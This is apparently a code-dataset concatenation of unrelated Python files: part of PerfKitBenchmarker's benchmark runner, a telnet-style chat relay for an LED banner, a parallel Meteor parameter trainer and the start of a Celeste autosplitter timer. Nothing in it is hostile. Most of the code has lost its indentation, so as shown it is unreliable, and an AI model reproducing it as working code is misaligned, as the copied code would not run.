'No run_uri specified. Attempting to run the following stages with '
'--run_uri=%s: %s', FLAGS.run_uri, ', '.join(FLAGS.run_stage))
else:
raise errors.Setup.NoRunURIError(
'No run_uri specified. Could not run the following stages: %s' %
', '.join(FLAGS.run_stage))
elif not FLAGS.run_uri.isalnum() or len(FLAGS.run_uri) > MAX_RUN_URI_LENGTH:
raise errors.Setup.BadRunURIError('run_uri must be alphanumeric and less '
'than or equal to %d characters in '
'length.' % MAX_RUN_URI_LENGTH)
def _CreateBenchmarkSpecs():
"""Create a list of BenchmarkSpecs for each benchmark run to be scheduled.
Returns:
A list of BenchmarkSpecs.
"""
specs = []
benchmark_tuple_list = benchmark_sets.GetBenchmarksFromFlags()
benchmark_counts = collections.defaultdict(itertools.count)
for benchmark_module, user_config in benchmark_tuple_list:
# Construct benchmark config object.
name = benchmark_module.BENCHMARK_NAME
expected_os_types = None if FLAGS.multi_os_benchmark else (
os_types.WINDOWS_OS_TYPES if FLAGS.os_type in os_types.WINDOWS_OS_TYPES
else os_types.LINUX_OS_TYPES)
with flag_util.OverrideFlags(FLAGS, user_config.get('flags')):
config_dict = benchmark_module.GetConfig(user_config)
config_spec_class = getattr(
benchmark_module, 'BENCHMARK_CONFIG_SPEC_CLASS',
benchmark_config_spec.BenchmarkConfigSpec)
config = config_spec_class(name, expected_os_types=expected_os_types,
flag_values=FLAGS, **config_dict)
# Assign a unique ID to each benchmark run. This differs even between two
# runs of the same benchmark within a single PKB run.
uid = name + str(next(benchmark_counts[name]))
# Optional step to check flag values and verify files exist.
check_prereqs = getattr(benchmark_module, 'CheckPrerequisites', None)
if check_prereqs:
try:
with config.RedirectFlags(FLAGS):
check_prereqs(config)
except:
logging.exception('Prerequisite check failed for %s', name)
raise
specs.append(benchmark_spec.BenchmarkSpec.GetBenchmarkSpec(
benchmark_module, config, uid))
return specs
def _WriteCompletionStatusFile(benchmark_specs, status_file):
"""Writes a completion status file.
The file has one json object per line, each with the following format:
{
"name": <benchmark name>,
"status": <completion status>,
"failed_substatus": <failed substatus>,
"status_detail": <descriptive string (if present)>,
"flags": <flags dictionary>
}
Args:
benchmark_specs: The list of BenchmarkSpecs that ran.
status_file: The file object to write the json structures to.
"""
for spec in benchmark_specs:
# OrderedDict so that we preserve key order in json file
status_dict = collections.OrderedDict()
status_dict['name'] = spec.name
status_dict['status'] = spec.status
if spec.failed_substatus:
status_dict['failed_substatus'] = spec.failed_substatus
if spec.status_detail:
status_dict['status_detail'] = spec.status_detail
status_dict['flags'] = spec.config.flags
status_file.write(json.dumps(status_dict) + '\n')
def DoProvisionPhase(spec, timer):
"""Performs the Provision phase of benchmark execution.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of resource
provisioning.
"""
if FLAGS.create_started_run_sample:
PublishRunStartedSample(spec)
logging.info('Provisioning resources for benchmark %s', spec.name)
spec.ConstructContainerCluster()
spec.ConstructContainerRegistry()
# spark service needs to go first, because it adds some vms.
spec.ConstructSparkService()
spec.ConstructDpbService()
spec.ConstructVirtualMachines()
spec.ConstructRelationalDb()
# CapacityReservations need to be constructed after VirtualMachines because
# it needs information about the VMs (machine type, count, zone, etc). The
# CapacityReservations will be provisioned before VMs.
spec.ConstructCapacityReservations()
spec.ConstructTpu()
spec.ConstructEdwService()
spec.ConstructVPNService()
spec.ConstructNfsService()
spec.ConstructSmbService()
# Pickle the spec before we try to create anything so we can clean
# everything up on a second run if something goes wrong.
spec.Pickle()
events.benchmark_start.send(benchmark_spec=spec)
try:
with timer.Measure('Resource Provisioning'):
spec.Provision()
finally:
# Also pickle the spec after the resources are created so that
# we have a record of things like AWS ids. Otherwise we won't
# be able to clean them up on a subsequent run.
spec.Pickle()
class InterruptChecker():
  """A class that checks for interrupts (preemptions) on VMs."""
def __init__(self, vms):
"""Start check interrupt thread.
Args:
vms: A list of virtual machines.
"""
self.vms = vms
self.check_threads = []
self.phase_status = threading.Event()
for vm in vms:
if vm.IsInterruptible():
check_thread = threading.Thread(target=self.CheckInterrupt, args=(vm,))
check_thread.start()
self.check_threads.append(check_thread)
def CheckInterrupt(self, vm):
"""Check interrupt.
Args:
vm: the virtual machine object.
Returns:
None
"""
    while not self.phase_status.is_set():
vm.UpdateInterruptibleVmStatus()
if vm.WasInterrupted():
return
else:
self.phase_status.wait(vm.GetPreemptibleStatusPollSeconds())
def EndCheckInterruptThread(self):
"""End check interrupt thread."""
self.phase_status.set()
for check_thread in self.check_threads:
check_thread.join()
def EndCheckInterruptThreadAndRaiseError(self):
"""End check interrupt thread and raise error.
Raises:
InsufficientCapacityCloudFailure when it catches interrupt.
Returns:
None
"""
self.EndCheckInterruptThread()
if any(vm.IsInterruptible() and vm.WasInterrupted() for vm in self.vms):
raise errors.Benchmarks.InsufficientCapacityCloudFailure('Interrupt')
def DoPreparePhase(spec, timer):
"""Performs the Prepare phase of benchmark execution.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of the
benchmark module's Prepare function.
"""
logging.info('Preparing benchmark %s', spec.name)
with timer.Measure('BenchmarkSpec Prepare'):
spec.Prepare()
with timer.Measure('Benchmark Prepare'):
spec.BenchmarkPrepare(spec)
spec.StartBackgroundWorkload()
if FLAGS.after_prepare_sleep_time:
logging.info('Sleeping for %s seconds after the prepare phase.',
FLAGS.after_prepare_sleep_time)
time.sleep(FLAGS.after_prepare_sleep_time)
def DoRunPhase(spec, collector, timer):
"""Performs the Run phase of benchmark execution.
Args:
spec: The BenchmarkSpec created for the benchmark.
collector: The SampleCollector object to add samples to.
timer: An IntervalTimer that measures the start and stop times of the
benchmark module's Run function.
"""
if FLAGS.before_run_pause:
six.moves.input('Hit enter to begin Run.')
deadline = time.time() + FLAGS.run_stage_time
run_number = 0
consecutive_failures = 0
last_publish_time = time.time()
def _IsRunStageFinished():
if FLAGS.run_stage_time > 0:
return time.time() > deadline
else:
return run_number >= FLAGS.run_stage_iterations
while True:
samples = []
logging.info('Running benchmark %s', spec.name)
events.before_phase.send(events.RUN_PHASE, benchmark_spec=spec)
try:
with timer.Measure('Benchmark Run'):
samples = spec.BenchmarkRun(spec)
except Exception:
consecutive_failures += 1
if consecutive_failures > FLAGS.run_stage_retries:
raise
logging.exception('Run failed (consecutive_failures=%s); retrying.',
consecutive_failures)
else:
consecutive_failures = 0
finally:
events.after_phase.send(events.RUN_PHASE, benchmark_spec=spec)
if FLAGS.run_stage_time or FLAGS.run_stage_iterations:
for s in samples:
s.metadata['run_number'] = run_number
# Add boot time metrics on the first run iteration.
if run_number == 0 and (FLAGS.boot_samples or
spec.name == cluster_boot_benchmark.BENCHMARK_NAME):
samples.extend(cluster_boot_benchmark.GetTimeToBoot(spec.vms))
if FLAGS.record_lscpu:
samples.extend(_CreateLscpuSamples(spec.vms))
if FLAGS.record_proccpu:
samples.extend(_CreateProcCpuSamples(spec.vms))
if FLAGS.record_cpu_vuln and run_number == 0:
samples.extend(_CreateCpuVulnerabilitySamples(spec.vms))
events.samples_created.send(
events.RUN_PHASE, benchmark_spec=spec, samples=samples)
collector.AddSamples(samples, spec.name, spec)
if (FLAGS.publish_after_run and FLAGS.publish_period is not None and
FLAGS.publish_period < (time.time() - last_publish_time)):
collector.PublishSamples()
last_publish_time = time.time()
run_number += 1
if _IsRunStageFinished():
if FLAGS.after_run_sleep_time:
logging.info('Sleeping for %s seconds after the run phase.',
FLAGS.after_run_sleep_time)
time.sleep(FLAGS.after_run_sleep_time)
break
def DoCleanupPhase(spec, timer):
"""Performs the Cleanup phase of benchmark execution.
Cleanup phase work should be delegated to spec.BenchmarkCleanup to allow
non-PKB based cleanup if needed.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of the
benchmark module's Cleanup function.
"""
if FLAGS.before_cleanup_pause:
six.moves.input('Hit enter to begin Cleanup.')
logging.info('Cleaning up benchmark %s', spec.name)
if (spec.always_call_cleanup or any([vm.is_static for vm in spec.vms]) or
spec.dpb_service is not None):
spec.StopBackgroundWorkload()
with timer.Measure('Benchmark Cleanup'):
spec.BenchmarkCleanup(spec)
def DoTeardownPhase(spec, timer):
"""Performs the Teardown phase of benchmark execution.
Teardown phase work should be delegated to spec.Delete to allow non-PKB based
teardown if needed.
Args:
spec: The BenchmarkSpec created for the benchmark.
timer: An IntervalTimer that measures the start and stop times of
resource teardown.
"""
logging.info('Tearing down resources for benchmark %s', spec.name)
with timer.Measure('Resource Teardown'):
spec.Delete()
def _SkipPendingRunsFile():
if FLAGS.skip_pending_runs_file and isfile(FLAGS.skip_pending_runs_file):
logging.warning('%s exists. Skipping benchmark.',
FLAGS.skip_pending_runs_file)
return True
else:
return False
_SKIP_PENDING_RUNS_CHECKS = []
def RegisterSkipPendingRunsCheck(func):
"""Registers a function to skip pending runs.
Args:
func: A function which returns True if pending runs should be skipped.
"""
_SKIP_PENDING_RUNS_CHECKS.append(func)
def PublishRunStartedSample(spec):
"""Publishes a sample indicating that a run has started.
This sample is published immediately so that there exists some metric for any
run (even if the process dies).
Args:
spec: The BenchmarkSpec object with run information.
"""
collector = SampleCollector()
metadata = {
'flags': str(flag_util.GetProvidedCommandLineFlags())
}
collector.AddSamples(
[sample.Sample('Run Started', 1, 'Run Started', metadata)],
spec.name, spec)
collector.PublishSamples()
def RunBenchmark(spec, collector):
"""Runs a single benchmark and adds the results to the collector.
Args:
spec: The BenchmarkSpec object with run information.
collector: The SampleCollector object to add samples to.
"""
# Since there are issues with the handling SIGINT/KeyboardInterrupt (see
# further discussion in _BackgroundProcessTaskManager) this mechanism is
# provided for defense in depth to force skip pending runs after SIGINT.
for f in _SKIP_PENDING_RUNS_CHECKS:
if f():
logging.warning('Skipping benchmark.')
return
spec.status = benchmark_status.FAILED
current_run_stage = stages.PROVISION
# Modify the logger prompt for messages logged within this function.
label_extension = '{}({}/{})'.format(
spec.name, spec.sequence_number, spec.total_benchmarks)
context.SetThreadBenchmarkSpec(spec)
log_context = log_util.GetThreadLogContext()
with log_context.ExtendLabel(label_extension):
with spec.RedirectGlobalFlags():
end_to_end_timer = timing_util.IntervalTimer()
detailed_timer = timing_util.IntervalTimer()
interrupt_checker = None
try:
with end_to_end_timer.Measure('End to End'):
if stages.PROVISION in FLAGS.run_stage:
DoProvisionPhase(spec, detailed_timer)
if stages.PREPARE in FLAGS.run_stage:
current_run_stage = stages.PREPARE
interrupt_checker = InterruptChecker(spec.vms)
DoPreparePhase(spec, detailed_timer)
interrupt_checker.EndCheckInterruptThreadAndRaiseError()
interrupt_checker = None
if stages.RUN in FLAGS.run_stage:
current_run_stage = stages.RUN
interrupt_checker = InterruptChecker(spec.vms)
DoRunPhase(spec, collector, detailed_timer)
interrupt_checker.EndCheckInterruptThreadAndRaiseError()
interrupt_checker = None
if stages.CLEANUP in FLAGS.run_stage:
current_run_stage = stages.CLEANUP
interrupt_checker = InterruptChecker(spec.vms)
DoCleanupPhase(spec, detailed_timer)
interrupt_checker.EndCheckInterruptThreadAndRaiseError()
interrupt_checker = None
if stages.TEARDOWN in FLAGS.run_stage:
current_run_stage = stages.TEARDOWN
DoTeardownPhase(spec, detailed_timer)
# Add timing samples.
if (FLAGS.run_stage == stages.STAGES and
timing_util.EndToEndRuntimeMeasurementEnabled()):
collector.AddSamples(
end_to_end_timer.GenerateSamples(), spec.name, spec)
if timing_util.RuntimeMeasurementsEnabled():
collector.AddSamples(
detailed_timer.GenerateSamples(), spec.name, spec)
# Add resource related samples.
collector.AddSamples(spec.GetSamples(), spec.name, spec)
except Exception as e:
# Log specific type of failure, if known
# TODO(dlott) Move to exception chaining with Python3 support
if (isinstance(e, errors.Benchmarks.InsufficientCapacityCloudFailure)
or 'InsufficientCapacityCloudFailure' in str(e)):
spec.failed_substatus = (
benchmark_status.FailedSubstatus.INSUFFICIENT_CAPACITY)
spec.status_detail = str(e)
elif (isinstance(e, errors.Benchmarks.QuotaFailure)
or 'QuotaFailure' in str(e)):
spec.failed_substatus = benchmark_status.FailedSubstatus.QUOTA
spec.status_detail = str(e)
elif isinstance(e, errors.Benchmarks.KnownIntermittentError):
spec.failed_substatus = (
benchmark_status.FailedSubstatus.KNOWN_INTERMITTENT)
spec.status_detail = str(e)
# Resource cleanup (below) can take a long time. Log the error to give
# immediate feedback, then re-throw.
logging.exception('Error during benchmark %s', spec.name)
if FLAGS.create_failed_run_samples:
collector.AddSamples(MakeFailedRunSample(
spec, str(e), current_run_stage), spec.name, spec)
# If the particular benchmark requests us to always call cleanup, do it
# here.
if stages.CLEANUP in FLAGS.run_stage and spec.always_call_cleanup:
DoCleanupPhase(spec, detailed_timer)
if (FLAGS.always_teardown_on_exception and
stages.TEARDOWN not in FLAGS.run_stage):
# Note that if TEARDOWN is specified, it will happen below.
DoTeardownPhase(spec, detailed_timer)
raise
finally:
if interrupt_checker:
interrupt_checker.EndCheckInterruptThread()
# Deleting resources should happen first so any errors with publishing
# don't prevent teardown.
if stages.TEARDOWN in FLAGS.run_stage:
spec.Delete()
if FLAGS.publish_after_run:
collector.PublishSamples()
events.benchmark_end.send(benchmark_spec=spec)
# Pickle spec to save final resource state.
spec.Pickle()
spec.status = benchmark_status.SUCCEEDED
def MakeFailedRunSample(spec, error_message, run_stage_that_failed):
"""Create a sample.Sample representing a failed run stage.
The sample metric will have the name 'Run Failed';
the value will be 1 (has to be convertible to a float),
and the unit will be 'Run Failed' (for lack of a better idea).
The sample metadata will include the error message from the
Exception, the run stage that failed, as well as all PKB
command line flags that were passed in.
Args:
spec: benchmark_spec
error_message: error message that was caught, resulting in the
run stage failure.
run_stage_that_failed: run stage that failed by raising an Exception
Returns:
a sample.Sample representing the run stage failure.
"""
# Note: currently all provided PKB command line flags are included in the
# metadata. We may want to only include flags specific to the benchmark that
  # failed. This can be accomplished using gflag's FlagsByModuleDict().
metadata = {
'error_message': error_message[0:FLAGS.failed_run_samples_error_length],
'run_stage': run_stage_that_failed,
'flags': str(flag_util.GetProvidedCommandLineFlags())
}
# Check for preempted VMs
def UpdateVmStatus(vm):
    # Setting vm.is_failed_run to True so that UpdateInterruptibleVmStatus
    # knows this is the final interruption check. GCP only needs to check for
    # interruption when a failure happens; for the other clouds, PKB needs to
    # check while the vm is alive.
vm.is_failed_run = True
vm.UpdateInterruptibleVmStatus()
vm_util.RunThreaded(UpdateVmStatus, spec.vms)
interruptible_vm_count = 0
interrupted_vm_count = 0
vm_status_codes = []
for vm in spec.vms:
if vm.IsInterruptible():
interruptible_vm_count += 1
if vm.WasInterrupted():
interrupted_vm_count += 1
spec.failed_substatus = (
benchmark_status.FailedSubstatus.INTERRUPTED)
status_code = vm.GetVmStatusCode()
if status_code:
vm_status_codes.append(status_code)
if spec.failed_substatus:
metadata['failed_substatus'] = spec.failed_substatus
if interruptible_vm_count:
metadata.update({'interruptible_vms': interruptible_vm_count,
'interrupted_vms': interrupted_vm_count,
'vm_status_codes': vm_status_codes})
if interrupted_vm_count:
logging.error(
'%d interruptible VMs were interrupted in this failed PKB run.',
interrupted_vm_count)
return [sample.Sample('Run Failed', 1, 'Run Failed', metadata)]
def RunBenchmarkTask(spec):
"""Task that executes RunBenchmark.
This is designed to be used with RunParallelProcesses.
Arguments:
spec: BenchmarkSpec. The spec to call RunBenchmark with.
Returns:
A tuple of BenchmarkSpec, list of samples.
"""
if _TEARDOWN_EVENT.is_set():
return spec, []
# Many providers name resources using run_uris. When running multiple
# benchmarks in parallel, this causes name collisions on resources.
# By modifying the run_uri, we avoid the collisions.
if FLAGS.run_processes and FLAGS.run_processes > 1:
spec.config.flags['run_uri'] = FLAGS.run_uri + str(spec.sequence_number)
# Unset run_uri so the config value takes precedence.
FLAGS['run_uri'].present = 0
collector = SampleCollector()
try:
RunBenchmark(spec, collector)
except BaseException as e:
logging.exception('Exception running benchmark')
msg = 'Benchmark {0}/{1} {2} (UID: {3}) failed.'.format(
spec.sequence_number, spec.total_benchmarks, spec.name, spec.uid)
if isinstance(e, KeyboardInterrupt) or FLAGS.stop_after_benchmark_failure:
logging.error('%s Execution will not continue.', msg)
_TEARDOWN_EVENT.set()
else:
logging.error('%s Execution will continue.', msg)
finally:
# We need to return both the spec and samples so that we know
# the status of the test and can publish any samples that
# haven't yet been published.
return spec, collector.samples
def _LogCommandLineFlags():
result = []
for name in FLAGS:
flag = FLAGS[name]
if flag.present:
result.append(flag.serialize())
logging.info('Flag values:\n%s', '\n'.join(result))
def SetUpPKB():
"""Set globals and environment variables for PKB.
After SetUpPKB() returns, it should be possible to call PKB
functions, like benchmark_spec.Prepare() or benchmark_spec.Run().
SetUpPKB() also modifies the local file system by creating a temp
directory and storing new SSH keys.
"""
try:
_InitializeRunUri()
except errors.Error as e:
logging.error(e)
sys.exit(1)
# Initialize logging.
vm_util.GenTempDir()
if FLAGS.use_pkb_logging:
log_util.ConfigureLogging(
stderr_log_level=log_util.LOG_LEVELS[FLAGS.log_level],
log_path=vm_util.PrependTempDir(LOG_FILE_NAME),
run_uri=FLAGS.run_uri,
file_log_level=log_util.LOG_LEVELS[FLAGS.file_log_level])
logging.info('PerfKitBenchmarker version: %s', version.VERSION)
# Translate deprecated flags and log all provided flag values.
disk.WarnAndTranslateDiskFlags()
_LogCommandLineFlags()
# Register skip pending runs functionality.
RegisterSkipPendingRunsCheck(_SkipPendingRunsFile)
# Check environment.
if not FLAGS.ignore_package_requirements:
requirements.CheckBasicRequirements()
for executable in REQUIRED_EXECUTABLES:
if not vm_util.ExecutableOnPath(executable):
raise errors.Setup.MissingExecutableError(
'Could not find required executable "%s"' % executable)
# Check mutually exclusive flags
if FLAGS.run_stage_iterations > 1 and FLAGS.run_stage_time > 0:
raise errors.Setup.InvalidFlagConfigurationError(
'Flags run_stage_iterations and run_stage_time are mutually exclusive')
vm_util.SSHKeyGen()
if FLAGS.static_vm_file:
with open(FLAGS.static_vm_file) as fp:
static_virtual_machine.StaticVirtualMachine.ReadStaticVirtualMachineFile(
fp)
events.initialization_complete.send(parsed_flags=FLAGS)
benchmark_lookup.SetBenchmarkModuleFunction(benchmark_sets.BenchmarkModule)
package_lookup.SetPackageModuleFunction(benchmark_sets.PackageModule)
# Update max_concurrent_threads to use at least as many threads as VMs. This
# is important for the cluster_boot benchmark where we want to launch the VMs
# in parallel.
if not FLAGS.max_concurrent_threads:
FLAGS.max_concurrent_threads = max(
background_tasks.MAX_CONCURRENT_THREADS,
FLAGS.num_vms)
logging.info('Setting --max_concurrent_threads=%d.',
FLAGS.max_concurrent_threads)
def RunBenchmarkTasksInSeries(tasks):
"""Runs benchmarks in series.
Arguments:
tasks: list of tuples of task: [(RunBenchmarkTask, (spec,), {}),]
Returns:
list of tuples of func results
"""
return [func(*args, **kwargs) for func, args, kwargs in tasks]
def RunBenchmarks():
"""Runs all benchmarks in PerfKitBenchmarker.
Returns:
Exit status for the process.
"""
benchmark_specs = _CreateBenchmarkSpecs()
if FLAGS.randomize_run_order:
random.shuffle(benchmark_specs)
if FLAGS.dry_run:
print('PKB will run with the following configurations:')
for spec in benchmark_specs:
print(spec)
print('')
return 0
collector = SampleCollector()
try:
tasks = [(RunBenchmarkTask, (spec,), {})
for spec in benchmark_specs]
if FLAGS.run_processes is None:
spec_sample_tuples = RunBenchmarkTasksInSeries(tasks)
else:
spec_sample_tuples = background_tasks.RunParallelProcesses(
tasks, FLAGS.run_processes, FLAGS.run_processes_delay)
benchmark_specs, sample_lists = list(zip(*spec_sample_tuples))
for sample_list in sample_lists:
collector.samples.extend(sample_list)
finally:
if collector.samples:
collector.PublishSamples()
if benchmark_specs:
logging.info(benchmark_status.CreateSummary(benchmark_specs))
logging.info('Complete logs can be found at: %s',
vm_util.PrependTempDir(LOG_FILE_NAME))
logging.info('Completion statuses can be found at: %s',
vm_util.PrependTempDir(COMPLETION_STATUS_FILE_NAME))
if stages.TEARDOWN not in FLAGS.run_stage:
logging.info(
'To run again with this setup, please use --run_uri=%s', FLAGS.run_uri)
if FLAGS.archive_bucket:
archive.ArchiveRun(vm_util.GetTempDir(), FLAGS.archive_bucket,
gsutil_path=FLAGS.gsutil_path,
prefix=FLAGS.run_uri + '_')
# Write completion status file(s)
completion_status_file_name = (
vm_util.PrependTempDir(COMPLETION_STATUS_FILE_NAME))
with open(completion_status_file_name, 'w') as status_file:
_WriteCompletionStatusFile(benchmark_specs, status_file)
if FLAGS.completion_status_file:
with open(FLAGS.completion_status_file, 'w') as status_file:
_WriteCompletionStatusFile(benchmark_specs, status_file)
all_benchmarks_succeeded = all(spec.status == benchmark_status.SUCCEEDED
for spec in benchmark_specs)
return 0 if all_benchmarks_succeeded else 1
def _GenerateBenchmarkDocumentation():
"""Generates benchmark documentation to show in --help."""
benchmark_docs = []
for benchmark_module in (linux_benchmarks.BENCHMARKS +
windows_benchmarks.BENCHMARKS):
benchmark_config = configs.LoadMinimalConfig(
benchmark_module.BENCHMARK_CONFIG, benchmark_module.BENCHMARK_NAME)
vm_groups = benchmark_config.get('vm_groups', {})
total_vm_count = 0
vm_str = ''
scratch_disk_str = ''
for group in six.itervalues(vm_groups):
group_vm_count = group.get('vm_count', 1)
if group_vm_count is None:
vm_str = 'variable'
else:
total_vm_count += group_vm_count
if group.get('disk_spec'):
scratch_disk_str = ' with scratch volume(s)'
name = benchmark_module.BENCHMARK_NAME
if benchmark_module in windows_benchmarks.BENCHMARKS:
name += ' (Windows)'
benchmark_docs.append('%s: %s (%s VMs%s)' %
(name,
benchmark_config['description'],
vm_str or total_vm_count,
scratch_disk_str))
return '\n\t'.join(benchmark_docs)
def _CreateLscpuSamples(vms):
"""Creates samples from linux VMs of lscpu output."""
samples = []
for vm in vms:
if vm.OS_TYPE in os_types.LINUX_OS_TYPES:
metadata = {'node_name': vm.name}
metadata.update(vm.CheckLsCpu().data)
samples.append(sample.Sample('lscpu', 0, '', metadata))
return samples
def _CreateProcCpuSamples(vms):
"""Creates samples from linux VMs of lscpu output."""
samples = []
for vm in vms:
if vm.OS_TYPE not in os_types.LINUX_OS_TYPES:
continue
data = vm.CheckProcCpu()
metadata = {'node_name': vm.name}
metadata.update(data.GetValues())
samples.append(sample.Sample('proccpu', 0, '', metadata))
metadata = {'node_name': vm.name}
for processor_id, raw_values in data.mappings.items():
values = ['%s=%s' % item for item in raw_values.items()]
metadata['proc_{}'.format(processor_id)] = ';'.join(sorted(values))
samples.append(sample.Sample('proccpu_mapping', 0, '', metadata))
return samples
def _CreateCpuVulnerabilitySamples(vms) -> List[sample.Sample]:
"""Returns samples of the VMs' CPU vulernabilites."""
def CreateSample(vm) -> Optional[sample.Sample]:
metadata = {'vm_name': vm.name}
metadata.update(vm.cpu_vulnerabilities.asdict)
return sample.Sample('cpu_vuln', 0, '', metadata)
linux_vms = [vm for vm in vms if vm.OS_TYPE in os_types.LINUX_OS_TYPES]
return vm_util.RunThreaded(CreateSample, linux_vms)
def Main():
log_util.ConfigureBasicLogging()
_InjectBenchmarkInfoIntoDocumentation()
_ParseFlags()
if FLAGS.helpmatch:
_PrintHelp(FLAGS.helpmatch)
return 0
if FLAGS.helpmatchmd:
_PrintHelpMD(FLAGS.helpmatchmd)
return 0
CheckVersionFlag()
SetUpPKB()
return RunBenchmarks()
|
pisocket.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# pisocket
# Telnet for sharing texts on LED banner
#
# see ../LICENSE file for licence
# see README.md for more info
# see CHANGELOG.md for detailed changes in each version
#
# (c) 2017 kj/P1X
#
import socket
import struct
import threading
import config
cfg = config.Config()
print('Starting PiSocket Server...')
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((cfg.get_setting('server_ip'), cfg.get_setting('server_port')))
sock.listen(1)
print('[i] Server is running at {ip}:{port}'.format(
ip = cfg.get_setting('server_ip'),
port = str(cfg.get_setting('server_port'))))
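# Clients can connect with any raw TCP client, for example:
#   telnet <server_ip> <server_port>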
clients = []
def handler(c, a):
    global clients
    global cfg
    while True:
        data = c.recv(1024)
        if not data:
            # Client disconnected: remove it and notify the remaining clients.
            clients.remove(c)
            c.close()
            for client in clients:
                client.send(cfg.get_msg('disconnected'))
            print(cfg.get_msg('disconnected'))
            break
        # Relay the received text to every other connected client.
        for client in clients:
            if not client == c:
                client.send(cfg.get_msg('chat') + bytes(data) + cfg.get_msg('chat_reset'))
def format_msg(msg):
    # Encode explicitly: on Python 3, bytes(str) without an encoding raises.
    return '{color}{msg}\n'.format(
        color=cfg.get_style('info'),
        msg=cfg.get_msg(msg)).encode('utf-8')
while True:
c, a = sock.accept()
thread = threading.Thread(target=handler,args=(c, a))
thread.daemon = True
thread.start()
clients.append(c)
    for cli in clients:
        if not cli == c:
            cli.send(cfg.get_msg('connected'))
        else:
            cli.send(cfg.get_msg('welcome'))
    print(cfg.get_msg('connected'))
|
meteor_shower.py
|
#!/usr/bin/env python
# Learn Meteor parameters quickly with up to 42 Meteors
# Run as many as requested in parallel
# Meteors use 1 cpu / 2gb each
import collections, os, subprocess, sys, threading
def main(argv):
if len(argv[1:]) < 7:
print >> sys.stderr, 'Learn Meteor parameters efficiently with parallel Trainers'
print >> sys.stderr, 'Usage: {0} <meteor.jar> <lang> <n-mods> <task> <data_dir> <work_dir> <n-jobs> [other args like -a par.gz, -ch, ...]'.format(argv[0])
sys.exit(1)
# Args
meteor_jar = os.path.abspath(argv[1])
lang = argv[2]
n_mods = int(argv[3])
task = argv[4]
data_dir = os.path.abspath(argv[5])
work_dir = os.path.abspath(argv[6])
n_jobs = int(argv[7])
sb_dir = os.path.join(work_dir, 'sandbox')
other_args = argv[8:]
# Working dir
if os.path.exists(work_dir):
print 'Work dir {0} exists, exiting'.format(work_dir)
sys.exit(1)
os.mkdir(work_dir)
os.mkdir(sb_dir)
# Weight ranges for jobs based on mod count
w_start_list = [1, 0, 0, 0]
w_end_list = [1, 0, 0, 0]
for i in range(n_mods):
w_end_list[i] = 1
w_start = ''
w_end = ''
for i in range(4):
w_start += str(w_start_list[i]) + ' '
w_end += str(w_end_list[i]) + ' '
w_start = w_start.strip()
w_end = w_end.strip()
# Step is always the same
step = '0.05 0.10 0.05 0.05 1.0 0.2 0.2 0.2'
# Queue Trainer commands
queue = collections.deque([])
for i in range(42):
sb_sub_dir = os.path.join(sb_dir, '{0}'.format(i + 1))
os.mkdir(sb_sub_dir)
out_file = os.path.join(work_dir, 'output.{0}'.format(i + 1))
a = 0.05 * (i / 2)
(g_min, g_max) = (0, 0.5) if (i % 2 == 0) else (0.55, 1.0)
start = '{0} 0 {1} 0 {2}'.format(a, g_min, w_start)
end = '{0} 2.5 {1} 1.0 {2}'.format(a, g_max, w_end)
# Retry in case of filesystem failure
trainer_cmd = 'cd {sd} && while true ; do sleep 1 ; java -Xmx1G -cp {0} Trainer {1} {2} -l {3} -i \'{4}\' -f \'{5}\' -s \'{6}\' {args} > {7} ; if [ "$?" = "0" ] ; then break ; fi ; done'.format(meteor_jar, task, data_dir, lang, start, end, step, out_file, sd=sb_sub_dir, args=' '.join(other_args))
queue.append(trainer_cmd)
# Run Trainers
for i in range(n_jobs):
queue.append(-1)
threads = []
for i in range(n_jobs):
t = threading.Thread(target=run, args=(queue,))
threads.append(t)
t.start()
for t in threads:
t.join()
# Sort output
sort_cmd = 'cat {0}/output.* |sort -g -S4G --parallel={1} >{0}/output.sort'.format(work_dir, n_jobs)
subprocess.call(sort_cmd, shell=True)
# Run commands until end of queue
def run(queue):
while True:
cmd = queue.popleft()
if cmd == -1:
return
subprocess.call(cmd, shell=True)
if __name__ == '__main__' : main(sys.argv)
|
celeste_timer.py
|
#!/usr/bin/env python3
import os
import struct
import threading
import time
import collections
import random
# 00 string Level;
# 08 int Chapter;
# 0c int Mode;
# 10 bool TimerActive;
# 11 bool ChapterStarted;
# 12 bool ChapterComplete;
# 18 long ChapterTime;
# 20 int ChapterStrawberries;
# 24 bool ChapterCassette;
# 25 bool ChapterHeart;
# 28 long FileTime;
# 30 int FileStrawberries;
# 34 int FileCassettes;
# 38 int FileHearts;
# 40 int CurrentChapterCheckpoints;
asi_path = os.environ.get('ASI_PATH', '/dev/shm/autosplitterinfo')
def split_time(filetime):
neg = filetime < 0
if neg:
filetime = -filetime
ms = filetime % 1000
se = filetime // 1000 % 60
mi = filetime // 1000 // 60 % 60
hr = filetime // 1000 // 60 // 60
return (neg, hr, mi, se, ms)
def fmt_time(tup, ms_decimals=3, full_width=False, sign=False):
if type(tup) is int:
tup = split_time(tup)
neg, hr, mi, se, ms = tup
if ms_decimals > 0:
if ms_decimals == 1:
ms //= 100
elif ms_decimals == 2:
ms //= 10
ms_str = ('.%%0%dd' % ms_decimals) % ms
else:
ms_str = ''
if hr or mi or full_width:
se_str = '%02d' % se
else:
se_str = '%d' % se
if hr or full_width:
mi_str = '%02d:' % mi
else:
if mi:
mi_str = '%d:' % mi
else:
mi_str = ''
if hr or full_width:
hr_str = '%d:' % hr
else:
hr_str = ''
if sign or neg:
sign_str = '-' if neg else '+'
else:
sign_str = ''
return sign_str + hr_str + mi_str + se_str + ms_str
class AutoSplitterInfo:
def __init__(self, filename=asi_path):
self.all_attrs = ('chapter', 'mode', 'timer_active', 'chapter_started', 'chapter_complete', 'chapter_time', 'chapter_strawberries', 'chapter_cassette', 'chapter_heart', 'file_time', 'file_strawberries', 'file_cassettes', 'file_hearts', 'chapter_checkpoints', 'in_cutscene', 'death_count', "level_name")
self.chapter = 0
self.mode = 0
self.timer_active = False
self.in_cutscene = False
self.death_count = 0
self.level_name = ""
self.chapter_started = False
self.chapter_complete = False
self.chapter_time = 0
self.chapter_strawberries = 0
self.chapter_cassette = False
self.chapter_heart = False
self.chapter_checkpoints = 0
self.file_time = 0
self.file_strawberries = 0
self.file_cassettes = 0
self.file_hearts = 0
if not os.path.exists(filename):
print('waiting for', filename, '...')
